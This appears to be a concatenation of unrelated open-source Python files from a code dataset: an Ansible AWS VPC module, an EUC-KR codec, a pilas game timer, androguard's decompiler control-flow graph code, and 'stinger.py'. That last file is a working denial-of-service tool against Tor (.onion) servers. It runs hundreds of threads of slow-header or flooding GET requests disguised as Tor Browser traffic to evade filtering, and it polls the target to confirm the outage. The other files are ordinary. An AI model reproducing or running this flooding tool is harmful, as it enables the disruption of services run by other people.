add_subnet = True
subnet_tags_current = True
new_subnet_tags = subnet.get('resource_tags', None)
subnet_tags_delete = []
for csn in current_subnets:
if subnet['cidr'] == csn.cidr_block:
add_subnet = False
# Check if AWS subnet tags are in playbook subnet tags
subnet_tags_extra = (set(csn.tags.items()).issubset(set(new_subnet_tags.items())))
# Check if subnet tags in playbook are in AWS subnet tags
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_extra is False:
try:
for item in csn.tags.items():
if item not in new_subnet_tags.items():
subnet_tags_delete.append(item)
subnet_tags_delete = [key[0] for key in subnet_tags_delete]
delete_subnet_tag = vpc_conn.delete_tags(csn.id, subnet_tags_delete)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete resource tag, error {0}'.format(e))
# Add new subnet tags if not current
subnet_tags_current = (set(new_subnet_tags.items()).issubset(set(csn.tags.items())))
if subnet_tags_current is not True:
try:
changed = True
create_subnet_tag = vpc_conn.create_tags(csn.id, new_subnet_tags)
except EC2ResponseError, e:
module.fail_json(msg='Unable to create resource tag, error: {0}'.format(e))
if add_subnet:
try:
new_subnet = vpc_conn.create_subnet(vpc.id, subnet['cidr'], subnet.get('az', None))
new_subnet_tags = subnet.get('resource_tags', None)
if new_subnet_tags:
                        # Sometimes AWS takes its time to create a subnet, so using the new subnet's id
                        # to create tags can raise an exception.
                        # boto doesn't seem to refresh the 'state' of the newly created subnet (it stays 'pending'),
                        # so we resort to polling vpc_conn.get_all_subnets with the id of the newly added subnet.
while len(vpc_conn.get_all_subnets(filters={ 'subnet-id': new_subnet.id })) == 0:
time.sleep(0.1)
vpc_conn.create_tags(new_subnet.id, new_subnet_tags)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create subnet {0}, error: {1}'.format(subnet['cidr'], e))
# Now delete all absent subnets
for csubnet in current_subnets:
delete_subnet = True
for subnet in subnets:
if csubnet.cidr_block == subnet['cidr']:
delete_subnet = False
if delete_subnet:
try:
vpc_conn.delete_subnet(csubnet.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete subnet {0}, error: {1}'.format(csubnet.cidr_block, e))
# Handle Internet gateway (create/delete igw)
igw = None
igw_id = None
igws = vpc_conn.get_all_internet_gateways(filters={'attachment.vpc-id': vpc.id})
if len(igws) > 1:
module.fail_json(msg='EC2 returned more than one Internet Gateway for id %s, aborting' % vpc.id)
if internet_gateway:
if len(igws) != 1:
try:
igw = vpc_conn.create_internet_gateway()
vpc_conn.attach_internet_gateway(igw.id, vpc.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to create Internet Gateway, error: {0}'.format(e))
else:
# Set igw variable to the current igw instance for use in route tables.
igw = igws[0]
else:
if len(igws) > 0:
try:
vpc_conn.detach_internet_gateway(igws[0].id, vpc.id)
vpc_conn.delete_internet_gateway(igws[0].id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete Internet Gateway, error: {0}'.format(e))
if igw is not None:
igw_id = igw.id
# Handle route tables - this may be worth splitting into a
# different module but should work fine here. The strategy to stay
    # idempotent is to basically build all the route tables as
# defined, track the route table ids, and then run through the
# remote list of route tables and delete any that we didn't
# create. This shouldn't interrupt traffic in theory, but is the
# only way to really work with route tables over time that I can
# think of without using painful aws ids. Hopefully boto will add
# the replace-route-table API to make this smoother and
# allow control of the 'main' routing table.
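    # In outline (illustrative, using boto's VPCConnection API as above):
    #   1. create_route_table() and create_route() for each declared table
    #   2. disassociate_route_table()/associate_route_table() per subnet
    #   3. delete_route_table() for every remote table we did not create,
    #      skipping the one holding the 'main' association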
if route_tables is not None:
rtb_needs_change = rtb_changed(route_tables, vpc_conn, module, vpc, igw)
if route_tables is not None and rtb_needs_change:
if not isinstance(route_tables, list):
module.fail_json(msg='route tables need to be a list of dictionaries')
# Work through each route table and update/create to match dictionary array
all_route_tables = []
for rt in route_tables:
try:
new_rt = vpc_conn.create_route_table(vpc.id)
new_rt_tags = rt.get('resource_tags', None)
if new_rt_tags:
vpc_conn.create_tags(new_rt.id, new_rt_tags)
for route in rt['routes']:
route_kwargs = {}
if route['gw'] == 'igw':
if not internet_gateway:
module.fail_json(
msg='You asked for an Internet Gateway ' \
'(igw) route, but you have no Internet Gateway'
)
route_kwargs['gateway_id'] = igw.id
elif route['gw'].startswith('i-'):
route_kwargs['instance_id'] = route['gw']
elif route['gw'].startswith('eni-'):
route_kwargs['interface_id'] = route['gw']
elif route['gw'].startswith('pcx-'):
route_kwargs['vpc_peering_connection_id'] = route['gw']
else:
route_kwargs['gateway_id'] = route['gw']
vpc_conn.create_route(new_rt.id, route['dest'], **route_kwargs)
# Associate with subnets
for sn in rt['subnets']:
rsn = vpc_conn.get_all_subnets(filters={'cidr': sn, 'vpc_id': vpc.id })
if len(rsn) != 1:
module.fail_json(
msg='The subnet {0} to associate with route_table {1} ' \
'does not exist, aborting'.format(sn, rt)
)
rsn = rsn[0]
# Disassociate then associate since we don't have replace
old_rt = vpc_conn.get_all_route_tables(
filters={'association.subnet_id': rsn.id, 'vpc_id': vpc.id}
)
old_rt = [ x for x in old_rt if x.id != None ]
if len(old_rt) == 1:
old_rt = old_rt[0]
association_id = None
for a in old_rt.associations:
if a.subnet_id == rsn.id:
association_id = a.id
vpc_conn.disassociate_route_table(association_id)
vpc_conn.associate_route_table(new_rt.id, rsn.id)
all_route_tables.append(new_rt)
changed = True
except EC2ResponseError, e:
module.fail_json(
msg='Unable to create and associate route table {0}, error: ' \
'{1}'.format(rt, e)
)
# Now that we are good to go on our new route tables, delete the
# old ones except the 'main' route table as boto can't set the main
# table yet.
all_rts = vpc_conn.get_all_route_tables(filters={'vpc-id': vpc.id})
for rt in all_rts:
if rt.id is None:
continue
delete_rt = True
for newrt in all_route_tables:
if newrt.id == rt.id:
delete_rt = False
break
if delete_rt:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
break
try:
if not is_main:
vpc_conn.delete_route_table(rt.id)
changed = True
except EC2ResponseError, e:
module.fail_json(msg='Unable to delete old route table {0}, error: {1}'.format(rt.id, e))
vpc_dict = get_vpc_info(vpc)
created_vpc_id = vpc.id
returned_subnets = []
current_subnets = vpc_conn.get_all_subnets(filters={ 'vpc_id': vpc.id })
for sn in current_subnets:
returned_subnets.append({
'resource_tags': dict((t.name, t.value) for t in vpc_conn.get_all_tags(filters={'resource-id': sn.id})),
'cidr': sn.cidr_block,
'az': sn.availability_zone,
'id': sn.id,
})
if subnets is not None:
# Sort subnets by the order they were listed in the play
order = {}
for idx, val in enumerate(subnets):
order[val['cidr']] = idx
# Number of subnets in the play
subnets_in_play = len(subnets)
returned_subnets.sort(key=lambda x: order.get(x['cidr'], subnets_in_play))
return (vpc_dict, created_vpc_id, returned_subnets, igw_id, changed)
def terminate_vpc(module, vpc_conn, vpc_id=None, cidr=None):
"""
Terminates a VPC
module: Ansible module object
vpc_conn: authenticated VPCConnection connection object
vpc_id: a vpc id to terminate
cidr: The cidr block of the VPC - can be used in lieu of an ID
Returns a dictionary of VPC information
about the VPC terminated.
If the VPC to be terminated is available
"changed" will be set to True.
"""
vpc_dict = {}
terminated_vpc_id = ''
changed = False
vpc = find_vpc(module, vpc_conn, vpc_id, cidr)
if vpc is not None:
if vpc.state == 'available':
terminated_vpc_id=vpc.id
vpc_dict=get_vpc_info(vpc)
try:
subnets = vpc_conn.get_all_subnets(filters={'vpc_id': vpc.id})
for sn in subnets:
vpc_conn.delete_subnet(sn.id)
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc.id}
)
for igw in igws:
vpc_conn.detach_internet_gateway(igw.id, vpc.id)
vpc_conn.delete_internet_gateway(igw.id)
rts = vpc_conn.get_all_route_tables(filters={'vpc_id': vpc.id})
for rt in rts:
rta = rt.associations
is_main = False
for a in rta:
if a.main:
is_main = True
if not is_main:
vpc_conn.delete_route_table(rt.id)
vpc_conn.delete_vpc(vpc.id)
except EC2ResponseError, e:
module.fail_json(
msg='Unable to delete VPC {0}, error: {1}'.format(vpc.id, e)
)
changed = True
vpc_dict['state'] = "terminated"
return (changed, vpc_dict, terminated_vpc_id)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
cidr_block = dict(),
instance_tenancy = dict(choices=['default', 'dedicated'], default='default'),
wait = dict(type='bool', default=False),
wait_timeout = dict(default=300),
dns_support = dict(type='bool', default=True),
dns_hostnames = dict(type='bool', default=True),
subnets = dict(type='list'),
vpc_id = dict(),
internet_gateway = dict(type='bool', default=False),
resource_tags = dict(type='dict', required=True),
route_tables = dict(type='list'),
state = dict(choices=['present', 'absent'], default='present'),
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
# If we have a region specified, connect to its endpoint.
if region:
try:
vpc_conn = boto.vpc.connect_to_region(
region,
**aws_connect_kwargs
)
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg = str(e))
else:
module.fail_json(msg="region must be specified")
igw_id = None
if module.params.get('state') == 'absent':
vpc_id = module.params.get('vpc_id')
cidr = module.params.get('cidr_block')
(changed, vpc_dict, new_vpc_id) = terminate_vpc(module, vpc_conn, vpc_id, cidr)
subnets_changed = None
elif module.params.get('state') == 'present':
# Changed is always set to true when provisioning a new VPC
(vpc_dict, new_vpc_id, subnets_changed, igw_id, changed) = create_vpc(module, vpc_conn)
module.exit_json(changed=changed, vpc_id=new_vpc_id, vpc=vpc_dict, igw_id=igw_id, subnets=subnets_changed)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
main()
| gpl-3.0 |
vicky2135/lucious | lib/python2.7/encodings/euc_kr.py | 816 | 1027 | #
# euc_kr.py: Python Unicode Codec for EUC_KR
#
# Written by Hye-Shik Chang <[email protected]>
#
import _codecs_kr, codecs
import _multibytecodec as mbc
codec = _codecs_kr.getcodec('euc_kr')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(
name='euc_kr',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
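# Note (illustrative): the stdlib encodings package locates this module via
# its codec search function and calls getregentry() to obtain the CodecInfo
# the first time codecs.lookup('euc_kr') is used.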
| bsd-3-clause |
whitepacket/Stinger-Tor | stinger.py | 1 | 6382 | #!/usr/bin/env python
#Stinger-Tor
#Function names follow the order in which Metasploit stages an attack (RECON - EXPLOIT - PAYLOAD - LOOT), purely for entertainment.
#Requires Socksipy (socks.py) in the current directory. Download it from here: https://raw.githubusercontent.com/mikedougherty/SocksiPy/master/socks.py
#I'm not responsible for any damages or consequences resulting from the use of this script, you are.
#For legal, research purposes only!
import os, socks, argparse, time, random, re, thread
parser = argparse.ArgumentParser(description='Tor server (.onion) unblockable DoS tool') #Basic CLI arguments.
parser.add_argument('-s', required=True, help="Host (.onion) to attack")
parser.add_argument('-p', default=80, help="Host port to flood (default: 80)")
parser.add_argument('-t', default=256, help="Attack threads (default: 256, max: 376)")
parser.add_argument('-tp', default=9050, help="Tor port on (default: 9050). Use 9150 when using the Tor Browser Bundle.")
parser.add_argument('-m', default='slow', help="Method. 1: slowget, 2: flood")
args = parser.parse_args()
if not args.s.lower().endswith(".onion"): #Only onion addresses accepted.
print "Error: server specified is not hosted under Tor."
exit(1)
elif len(args.s) != 22:
print "Error: server specified is not hosted under Tor."
exit(1)
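# Note: a (v2) onion hostname is 16 base32 characters plus ".onion",
# 22 characters in total, which is what the length check above assumes.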
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", int(args.tp))
except Exception:
print "Error: Tor port is not an integer."
exit(1)
exploit = ("GET / HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-US,en;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Connection: keep-alive\r\n\r\n"
% (args.s)) #Exact replica of the HTTP request sent by the Tor Browser Bundle, filtering this request will be DoS in itself.
# update: you will want to change the user agent to the latest Tor Browser UA or just copy a full request using Live HTTP Headers or Wireshark so it stays identical.
def payload(s, exploit): #floods the open socket with GET requests till it closes (if ever), or opens as many sockets as possible and slowly sends the HTTP headers.
if args.m.lower().startswith("slow") or args.m.lower() == '1':
while 1:
for header in exploit:
s.send(header)
time.sleep(random.randrange(5,20))
else:
while 1:
s.send(exploit)
def recon(host, port, exploit):
while 1:
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((host, port))
payload(s,exploit)
except:
pass
if int(args.tp) < 1: #Make sure all options were typed correctly...
print "Error: invalid tor port."
exit(1)
elif int(args.tp) > 65535:
print "Error: tor port too large."
exit(1)
elif int(args.p) < 1:
print "Error: invalid server port."
exit(1)
elif int(args.t) < 1:
print "Error: too little threads."
exit(1)
elif int(args.t) > 376:
print "Error: too many threads. maximum is 376."
exit(1)
elif int(args.p) > 65535:
print "Error: server port too large."
exit(1)
method = "SlowGET" #Below is basically a summary of the user-specified settings and what's taking place.
if not args.m.lower().startswith('slow') and not args.m == "1":
method = "Flooder"
print '*********************************'
print '* [stinger] *'
print '* initiating stress test.. *'
print '* -stress test details- *'
print '* host: '+args.s+' *'
nex = '* server port: '+str(args.p)
for x in range(0,15 - len(list(str(args.p))) + 1):
nex += " "
nex += "*"
print nex
nex = '* tor port: '+str(args.tp)
for x in range(0,18 - len(list(str(args.tp))) + 1):
nex += " "
nex += "*"
print nex
print '* DoS ETA: 1 minute *'
print '* method: '+method+' *'
nex = '* threads: '+str(args.t)
if int(args.t) > 99:
for x in range(0,17):
nex += " "
elif int(args.t) < 100 and int(args.t) > 9:
for x in range(0,18):
nex += " "
else:
for x in range(0,19):
nex += " "
nex += "*"
print nex
print '*********************************'
time.sleep(3)
print 'starting threads...'
time.sleep(3)
for x in range(0,int(args.t)):
try:
thread.start_new_thread(recon, (args.s, int(args.p), exploit))
print 'Thread: '+str(x+1)+' started.'
except:
print "Error: maximum threads reached. attack will still continue."
break
print 'threads started.'
time.sleep(2)
print "initiating server status checker." #Here we repeatedly check the server status in order to know weather or not our DoS is succeeding.
while 1: #it might be a good idea to develop something to escape this loop, so we don't need to kill the Python process.
try:
s = socks.socksocket()
s.settimeout(30)
s.connect((args.s, int(args.p)))
s.send(exploit)
r = s.recv(256)
s.close() #it might be a good idea to use more specified error messages to avoid false positives, however, this is sufficient most of the time.
        if 'network read timeout' in r.lower() or 'network connect timeout' in r.lower() or 'origin connection time-out' in r.lower() or 'unknown error' in r.lower() or 'bandwidth limit exceeded' in r.lower() or 'gateway timeout' in r.lower() or 'service unavailable' in r.lower() or 'bad gateway' in r.lower() or 'internal server error' in r.lower() or 'no response' in r.lower() or 'too many requests' in r.lower() or 'request timeout' in r.lower():
#detects when the server software is under denial of service, but the server is still responsive.
#598 Network read timeout - 599 Network connect timeout - 522 Origin Connection Time-out - 520 Unknown Error - 509 Bandwidth Limit - 504 Gateway Timeout - 503 Service Unavaliable - 502 Bad Gateway - 500 Internal Server Error - 444 No Response - 429 Too Many Requests - 408 Request Timeout
print 'Server offline: returning error responses.'
else:
print 'Server is online.'
except:
print 'Server offline: unable to connect to TCP port, or receive HTTP response.'
| mpl-2.0 |
DrDub/pilas | pilas/actores/temporizador.py | 5 | 2558 | # -*- encoding: utf-8 -*-
# For Pilas engine - A video game framework.
#
# Copyright 2010 - Pablo Garrido
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
#
import pilas
from pilas.actores import Texto
from pilas import colores
class Temporizador(Texto):
"""Representa un contador de tiempo con cuenta regresiva.
Por ejemplo:
>>> t = pilas.actores.Temporizador()
>>> def hola_mundo():
... pilas.avisar("Hola mundo, pasaron 10 segundos...")
...
>>> t.ajustar(10, hola_mundo)
>>> t.iniciar()
"""
def __init__(self, x=0, y=0, color=colores.negro, fuente=None,
autoeliminar=False):
"""Inicializa el temporizador.
:param x: Posición horizontal.
:param y: Posición vertical.
:param color: El color que tendrá el texto.
:param autoeliminar: Indica si se desea eliminar el Temporizador
cuando acabe.
"""
Texto.__init__(self, '0', x=x, y=y, fuente=fuente)
self.ajustar(1, self.funcion_vacia)
self.color = color
self.autoeliminar = autoeliminar
    # fallback used when no timer function has been set
def funcion_vacia(self):
pass
def definir_tiempo_texto(self, variable):
"""Define el texto a mostrar en el temporizador.
:param variable: La cadena de texto a mostrar.
"""
self.texto = str(variable)
    # ajustar() lets us set the countdown time and the
    # function we want to execute
def ajustar(self, tiempo=1, funcion=None):
"""Indica una funcion para ser invocada en el tiempo indicado.
La función no tiene que recibir parámetros, y luego de
ser indicada se tiene que iniciar el temporizador.
"""
self.tiempo = tiempo
self.definir_tiempo_texto(self.tiempo)
        if funcion is None:
            self.funcion = self.funcion_vacia
else:
self.funcion = funcion
def _restar_a_contador(self):
if self.tiempo != 0:
self.tiempo -= 1
self.definir_tiempo_texto(self.tiempo)
return True
def autoeliminar_al_terminar(self):
self.funcion()
if self.autoeliminar:
self.eliminar()
def iniciar(self):
"""Inicia el contador de tiempo con la función indicada."""
pilas.mundo.agregar_tarea_una_vez(self.tiempo, self.autoeliminar_al_terminar)
pilas.mundo.agregar_tarea_siempre(1, self._restar_a_contador)
| lgpl-3.0 |
dandycheung/androguard | androguard/decompiler/dad/graph.py | 34 | 17082 | # This file is part of Androguard.
#
# Copyright (c) 2012 Geoffroy Gueguen <[email protected]>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from collections import defaultdict
from androguard.decompiler.dad.basic_blocks import (build_node_from_block,
StatementBlock, CondBlock)
from androguard.decompiler.dad.instruction import Variable
logger = logging.getLogger('dad.graph')
class Graph():
def __init__(self):
self.entry = None
self.exit = None
self.nodes = list()
self.rpo = []
self.edges = defaultdict(list)
self.catch_edges = defaultdict(list)
self.reverse_edges = defaultdict(list)
self.reverse_catch_edges = defaultdict(list)
self.loc_to_ins = None
self.loc_to_node = None
def sucs(self, node):
return self.edges.get(node, [])
def all_sucs(self, node):
return self.edges.get(node, []) + self.catch_edges.get(node, [])
def preds(self, node):
return [n for n in self.reverse_edges.get(node, [])
if not n.in_catch]
def all_preds(self, node):
return (self.reverse_edges.get(node, []) +
self.reverse_catch_edges.get(node, []))
def add_node(self, node):
self.nodes.append(node)
def add_edge(self, e1, e2):
lsucs = self.edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def add_catch_edge(self, e1, e2):
lsucs = self.catch_edges[e1]
if e2 not in lsucs:
lsucs.append(e2)
lpreds = self.reverse_catch_edges[e2]
if e1 not in lpreds:
lpreds.append(e1)
def remove_node(self, node):
preds = self.reverse_edges.pop(node, [])
for pred in preds:
self.edges[pred].remove(node)
succs = self.edges.pop(node, [])
for suc in succs:
self.reverse_edges[suc].remove(node)
exc_preds = self.reverse_catch_edges.pop(node, [])
for pred in exc_preds:
self.catch_edges[pred].remove(node)
exc_succs = self.catch_edges.pop(node, [])
for suc in exc_succs:
self.reverse_catch_edges[suc].remove(node)
self.nodes.remove(node)
if node in self.rpo:
self.rpo.remove(node)
del node
def number_ins(self):
self.loc_to_ins = {}
self.loc_to_node = {}
num = 0
for node in self.rpo:
start_node = num
num = node.number_ins(num)
end_node = num - 1
self.loc_to_ins.update(node.get_loc_with_ins())
self.loc_to_node[(start_node, end_node)] = node
def get_ins_from_loc(self, loc):
return self.loc_to_ins.get(loc)
def get_node_from_loc(self, loc):
for (start, end), node in self.loc_to_node.iteritems():
if start <= loc <= end:
return node
def remove_ins(self, loc):
ins = self.get_ins_from_loc(loc)
self.get_node_from_loc(loc).remove_ins(loc, ins)
self.loc_to_ins.pop(loc)
def split_if_nodes(self):
'''
Split IfNodes in two nodes, the first node is the header node, the
second one is only composed of the jump condition.
'''
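        # Illustrative sketch: a node  [stmt1, stmt2, if-cond]  becomes
        #   'name-pre': [stmt1, stmt2]  -->  'name-cond': [if-cond]
        # with 'name-cond' inheriting the original true/false successors and
        # exception edges re-pointed at 'name-pre'.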
node_map = {n: n for n in self.nodes}
to_update = set()
for node in self.nodes[:]:
if node.type.is_cond:
if len(node.get_ins()) > 1:
pre_ins = node.get_ins()[:-1]
last_ins = node.get_ins()[-1]
pre_node = StatementBlock('%s-pre' % node.name, pre_ins)
cond_node = CondBlock('%s-cond' % node.name, [last_ins])
node_map[node] = pre_node
node_map[pre_node] = pre_node
node_map[cond_node] = cond_node
pre_node.copy_from(node)
cond_node.copy_from(node)
for var in node.var_to_declare:
pre_node.add_variable_declaration(var)
pre_node.type.is_stmt = True
cond_node.true = node.true
cond_node.false = node.false
for pred in self.all_preds(node):
pred_node = node_map[pred]
# Verify that the link is not an exception link
if node not in self.sucs(pred):
self.add_catch_edge(pred_node, pre_node)
continue
if pred is node:
pred_node = cond_node
if pred.type.is_cond: # and not (pred is node):
if pred.true is node:
pred_node.true = pre_node
if pred.false is node:
pred_node.false = pre_node
self.add_edge(pred_node, pre_node)
for suc in self.sucs(node):
self.add_edge(cond_node, node_map[suc])
# We link all the exceptions to the pre node instead of the
# condition node, which should not trigger any of them.
for suc in self.catch_edges.get(node, []):
self.add_catch_edge(pre_node, node_map[suc])
if node is self.entry:
self.entry = pre_node
self.add_node(pre_node)
self.add_node(cond_node)
self.add_edge(pre_node, cond_node)
pre_node.update_attribute_with(node_map)
cond_node.update_attribute_with(node_map)
self.remove_node(node)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def simplify(self):
'''
Simplify the CFG by merging/deleting statement nodes when possible:
If statement B follows statement A and if B has no other predecessor
besides A, then we can merge A and B into a new statement node.
We also remove nodes which do nothing except redirecting the control
flow (nodes which only contains a goto).
'''
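        # e.g. A -> B where A is a statement node whose only successor is B
        # and B's only predecessor is A: B's instructions are appended to A
        # and B is removed; empty goto-only nodes are bypassed entirely.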
redo = True
while redo:
redo = False
node_map = {}
to_update = set()
for node in self.nodes[:]:
if node.type.is_stmt and node in self.nodes:
sucs = self.all_sucs(node)
if len(sucs) != 1:
continue
suc = sucs[0]
if len(node.get_ins()) == 0:
if any(pred.type.is_switch
for pred in self.all_preds(node)):
continue
if node is suc:
continue
node_map[node] = suc
for pred in self.all_preds(node):
pred.update_attribute_with(node_map)
if node not in self.sucs(pred):
self.add_catch_edge(pred, suc)
continue
self.add_edge(pred, suc)
redo = True
if node is self.entry:
self.entry = suc
self.remove_node(node)
elif (suc.type.is_stmt and
len(self.all_preds(suc)) == 1 and
not (suc in self.catch_edges) and
not ((node is suc) or (suc is self.entry))):
ins_to_merge = suc.get_ins()
node.add_ins(ins_to_merge)
for var in suc.var_to_declare:
node.add_variable_declaration(var)
new_suc = self.sucs(suc)[0]
if new_suc:
self.add_edge(node, new_suc)
for exception_suc in self.catch_edges.get(suc, []):
self.add_catch_edge(node, exception_suc)
redo = True
self.remove_node(suc)
else:
to_update.add(node)
for node in to_update:
node.update_attribute_with(node_map)
def compute_rpo(self):
'''
Number the nodes in reverse post order.
An RPO traversal visit as many predecessors of a node as possible
before visiting the node itself.
'''
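        # Example (illustrative): for entry A -> {B, C}, B -> D, C -> D,
        # post_order() yields D before B and C, and B and C before A, so the
        # reverse numbering below orders A ahead of B/C and B/C ahead of D.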
nb = len(self.nodes) + 1
for node in self.post_order():
node.num = nb - node.po
self.rpo = sorted(self.nodes, key=lambda n: n.num)
def post_order(self):
'''
Return the nodes of the graph in post-order i.e we visit all the
children of a node before visiting the node itself.
'''
def _visit(n, cnt):
visited.add(n)
for suc in self.all_sucs(n):
if not suc in visited:
for cnt, s in _visit(suc, cnt):
yield cnt, s
n.po = cnt
yield cnt + 1, n
visited = set()
for _, node in _visit(self.entry, 1):
yield node
def draw(self, name, dname, draw_branches=True):
from pydot import Dot, Edge
g = Dot()
g.set_node_defaults(color='lightgray', style='filled', shape='box',
fontname='Courier', fontsize='10')
for node in sorted(self.nodes, key=lambda x: x.num):
if draw_branches and node.type.is_cond:
g.add_edge(Edge(str(node), str(node.true), color='green'))
g.add_edge(Edge(str(node), str(node.false), color='red'))
else:
for suc in self.sucs(node):
g.add_edge(Edge(str(node), str(suc), color='blue'))
for except_node in self.catch_edges.get(node, []):
g.add_edge(Edge(str(node), str(except_node),
color='black', style='dashed'))
g.write_png('%s/%s.png' % (dname, name))
def immediate_dominators(self):
return dom_lt(self)
def __len__(self):
return len(self.nodes)
def __repr__(self):
return str(self.nodes)
def __iter__(self):
for node in self.nodes:
yield node
def dom_lt(graph):
    '''Dominator algorithm from Lengauer-Tarjan'''
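    # The steps below follow Lengauer & Tarjan (1979): a DFS numbering,
    # semidominator computation with path compression (_eval/_compress),
    # then immediate dominators; dom[graph.entry] ends up as None.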
def _dfs(v, n):
semi[v] = n = n + 1
vertex[n] = label[v] = v
ancestor[v] = 0
for w in graph.all_sucs(v):
if not semi[w]:
parent[w] = v
n = _dfs(w, n)
pred[w].add(v)
return n
def _compress(v):
u = ancestor[v]
if ancestor[u]:
_compress(u)
if semi[label[u]] < semi[label[v]]:
label[v] = label[u]
ancestor[v] = ancestor[u]
def _eval(v):
if ancestor[v]:
_compress(v)
return label[v]
return v
def _link(v, w):
ancestor[w] = v
parent, ancestor, vertex = {}, {}, {}
label, dom = {}, {}
pred, bucket = defaultdict(set), defaultdict(set)
# Step 1:
semi = {v: 0 for v in graph.nodes}
n = _dfs(graph.entry, 0)
for i in xrange(n, 1, -1):
w = vertex[i]
# Step 2:
for v in pred[w]:
u = _eval(v)
y = semi[w] = min(semi[w], semi[u])
bucket[vertex[y]].add(w)
pw = parent[w]
_link(pw, w)
# Step 3:
bpw = bucket[pw]
while bpw:
v = bpw.pop()
u = _eval(v)
dom[v] = u if semi[u] < semi[v] else pw
# Step 4:
for i in range(2, n + 1):
w = vertex[i]
dw = dom[w]
if dw != vertex[semi[w]]:
dom[w] = dom[dw]
dom[graph.entry] = None
return dom
def bfs(start):
to_visit = [start]
visited = set([start])
while to_visit:
node = to_visit.pop(0)
yield node
if node.exception_analysis:
for _, _, exception in node.exception_analysis.exceptions:
if exception not in visited:
to_visit.append(exception)
visited.add(exception)
for _, _, child in node.childs:
if child not in visited:
to_visit.append(child)
visited.add(child)
class GenInvokeRetName(object):
def __init__(self):
self.num = 0
self.ret = None
def new(self):
self.num += 1
self.ret = Variable('tmp%d' % self.num)
return self.ret
def set_to(self, ret):
self.ret = ret
def last(self):
return self.ret
def make_node(graph, block, block_to_node, vmap, gen_ret):
node = block_to_node.get(block)
if node is None:
node = build_node_from_block(block, vmap, gen_ret)
block_to_node[block] = node
if block.exception_analysis:
for _type, _, exception_target in block.exception_analysis.exceptions:
exception_node = block_to_node.get(exception_target)
if exception_node is None:
exception_node = build_node_from_block(exception_target,
vmap, gen_ret, _type)
exception_node.in_catch = True
block_to_node[exception_target] = exception_node
graph.add_catch_edge(node, exception_node)
for _, _, child_block in block.childs:
child_node = block_to_node.get(child_block)
if child_node is None:
child_node = build_node_from_block(child_block, vmap, gen_ret)
block_to_node[child_block] = child_node
graph.add_edge(node, child_node)
if node.type.is_switch:
node.add_case(child_node)
if node.type.is_cond:
if_target = ((block.end / 2) - (block.last_length / 2) +
node.off_last_ins)
child_addr = child_block.start / 2
if if_target == child_addr:
node.true = child_node
else:
node.false = child_node
# Check that both branch of the if point to something
# It may happen that both branch point to the same node, in this case
# the false branch will be None. So we set it to the right node.
# TODO: In this situation, we should transform the condition node into
# a statement node
if node.type.is_cond and node.false is None:
node.false = node.true
return node
def construct(start_block, vmap, exceptions):
bfs_blocks = bfs(start_block)
graph = Graph()
gen_ret = GenInvokeRetName()
# Construction of a mapping of basic blocks into Nodes
block_to_node = {}
exceptions_start_block = []
for exception in exceptions:
for _, _, block in exception.exceptions:
exceptions_start_block.append(block)
for block in bfs_blocks:
node = make_node(graph, block, block_to_node, vmap, gen_ret)
graph.add_node(node)
graph.entry = block_to_node[start_block]
del block_to_node, bfs_blocks
graph.compute_rpo()
graph.number_ins()
for node in graph.rpo:
preds = [pred for pred in graph.all_preds(node)
if pred.num < node.num]
if preds and all(pred.in_catch for pred in preds):
node.in_catch = True
# Create a list of Node which are 'return' node
# There should be one and only one node of this type
# If this is not the case, try to continue anyway by setting the exit node
# to the one which has the greatest RPO number (not necessarily the case)
lexit_nodes = [node for node in graph if node.type.is_return]
if len(lexit_nodes) > 1:
# Not sure that this case is possible...
logger.error('Multiple exit nodes found !')
graph.exit = graph.rpo[-1]
elif len(lexit_nodes) < 1:
# A method can have no return if it has throw statement(s) or if its
        # body is a while(1) without break/return.
logger.debug('No exit node found !')
else:
graph.exit = lexit_nodes[0]
return graph
| apache-2.0 |
